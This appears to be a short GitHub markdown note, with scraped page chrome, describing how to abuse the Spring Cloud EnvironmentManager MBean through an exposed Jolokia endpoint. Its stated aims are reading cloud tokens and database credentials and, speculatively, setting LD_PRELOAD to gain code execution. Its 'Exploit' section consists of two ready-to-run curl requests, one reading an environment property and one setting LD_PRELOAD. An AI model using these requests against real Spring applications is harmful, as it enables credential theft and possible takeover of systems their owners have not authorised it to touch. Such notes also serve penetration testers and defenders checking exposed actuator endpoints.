Short description

One can read and write the remote env by abusing the SpingFramework EnvironmentManager!
Read AWS/EKS tokens, or db credentials, etc
Maybe (no poc yet) try to overwrite LD_PRELOAD and force a a new sub-process creation

Exploit

curl -kg 'http://127.0.0.1/jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager/getProperty/USER'
curl -kg 'http://127.0.0.1/jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager/setProperty/LD_PRELOAD/!/tmp!/'

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

env-read-write-environmentmanager.md

env-read-write-environmentmanager.md

Short description

Exploit

Files

env-read-write-environmentmanager.md

Latest commit

History

env-read-write-environmentmanager.md

File metadata and controls

Short description

Exploit